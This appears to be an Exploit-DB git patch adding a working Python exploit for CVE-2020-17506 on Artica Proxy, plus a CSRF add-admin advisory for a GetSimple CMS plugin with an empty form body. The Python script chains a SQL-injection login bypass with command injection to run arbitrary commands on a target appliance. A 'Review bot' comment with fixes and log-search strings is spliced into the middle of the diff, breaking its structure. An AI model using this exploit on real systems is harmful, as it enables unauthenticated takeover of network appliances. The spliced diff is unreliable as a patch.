From e3b25a25ca8957e1451cb9e93a3be1b25fa167e9 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 14 Aug 2020 05:01:50 +0000
Subject: [PATCH] DB: 2020-08-14 2 changes to exploits/shellcodes Artica Proxy 4.3.0 - Authentication Bypass GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)
---
 exploits/hardware/webapps/48744.py | 52 ++++++++++++++++++++++++++++++
 exploits/php/webapps/48745.txt | 33 +++++++++++++++++++
 files_exploits.csv | 2 ++
 3 files changed, 87 insertions(+)
 create mode 100755 exploits/hardware/webapps/48744.py
 create mode 100644 exploits/php/webapps/48745.txt
diff --git a/exploits/hardware/webapps/48744.py b/exploits/hardware/webapps/48744.py
new file mode 100755
index 000000000..8fe382a18
--- /dev/null
+++ b/exploits/hardware/webapps/48744.py
@@ -0,0 +1,52 @@
+# Exploit Title: Artica Proxy 4.3.0 - Authentication Bypass
+# Google Dork: N/A
+# Date: 2020-08-13
+# Exploit Author: Dan Duffy
+# Vendor Homepage: http://articatech.net/
+# Software Link: http://articatech.net/download2x.php?IsoOnly=yes
+# Version: 4.30.00000000 (REQUIRED)
+# Tested on: Debian
+# CVE : CVE-2020-17506
+
+import requests
+import argparse
+from bs4 import BeautifulSoup
+
+
+def bypass_auth(session, args):
+ login_endpoint = "/fw.login.php?apikey="
+ payload = "%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"
+
+ print("[+] Bypassing authentication...")
+ session.get(args.host + login_endpoint + payload, verify=False)
+
+ return session
+
+
+def run_command(session, args):
+ cmd_endpoint = "/cyrus.index.php?service-cmds-peform=||{}||".format(args.command)
+ print("[+] Running command: {}".format(args.command))
+ response = session.post(args.host + cmd_endpoint, verify=False)
+ soup = BeautifulSoup(response.text, "html.parser")
+ print(soup.find_all("code")[1].get_text())
+
+
+def main():
+ parser = argparse.ArgumentParser(description="CVE-2020-17506 Artica PoC.")
+ parser.add_argument(
+ "--host", help="The host to target. Format example: https://host:port",
+ )
+ parser.add_argument("--command", help="The command to run")
+
+ args = parser.parse_args()
+ if not args.host or not args.command:
+ parser.print_help()
+ exit(0)
+ session = requests.Session()
+ session = bypass_auth(session, args)
+
+ run_command(session, args)
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
diff --git a/exploits/php/webapps/48745.txt b/exploits/php/webapps/48745.txt
new file mode 100644
index 000000000..c42e67a8d
--- /dev/null
+++ b/exploits/php/webapps/48745.txt
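Review bot: In exploits/hardware/webapps/48744.py neither request's outcome is checked: `bypass_auth` discards the response from `session.get(...)`, and `run_command` indexes `soup.find_all("code")[1]` unguarded, so a patched appliance, or any reply with fewer than two `<code>` elements, ends in an `IndexError` traceback instead of a clear negative result. Anyone using the script to confirm that the fix for CVE-2020-17506 is in place needs that distinction; `blocks = soup.find_all("code")` followed by `if len(blocks) < 2: print("[-] No command output returned"); return` would give it. Both calls also pass `verify=False` without a `timeout=`, so an unresponsive host blocks the run indefinitely. On the detection side, the two literal request paths in this file, `/fw.login.php?apikey=` carrying a URL-encoded `UNION select` and `/cyrus.index.php?service-cmds-peform=`, are the strings to search for in the appliance's web access logs.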
@@ -0,0 +1,33 @@
+# Exploit Title: GetSimple CMS Plugin Multi User v1.8.2 - Cross-Site Request Forgery (Add Admin)
+# Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec)
+# Date: August 2020-08-12
+# Vendor Homepage: http://get-simple.info/extend/plugin/multi-user/133/
+# Software Link: http://get-simple.info/extend/export/960/133/multi-user.zip
+# Version: 1.8.2
+# Tested On: Windows 10 Pro + XAMPP
+# CWE-352: Cross-Site Request Forgery (CSRF)
+# Vulnerability Description:
+# Cross-Site Request Forgery (CSRF) vulnerability in Multi User v1.8.2 plugin for GetSimple CMS allows remote attackers to add an Admin user via authenticated admin visiting a third-party site.
+
+## Usage:
++ Change to target IP address or domain name
++ Change to target username
++ Change to target password
+
+## CSRF POST Form Method
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f3274508b..fa752befb 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42985,3 +42985,5 @@ id,file,description,date,author,type,platform,port
 48741,exploits/php/webapps/48741.txt,"Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)",2020-08-11,"Roel van Beurden",webapps,php,
 48742,exploits/php/webapps/48742.txt,"CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload",2020-08-12,"Roel van Beurden",webapps,php,
 48743,exploits/php/webapps/48743.txt,"vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution",2020-08-12,zenofex,webapps,php,
+48744,exploits/hardware/webapps/48744.py,"Artica Proxy 4.3.0 - Authentication Bypass",2020-08-13,"Dan Duffy",webapps,hardware,
+48745,exploits/php/webapps/48745.txt,"GetSimple CMS Plugin Multi User 1.8.2 - Cross-Site Request Forgery (Add Admin)",2020-08-13,boku,webapps,php,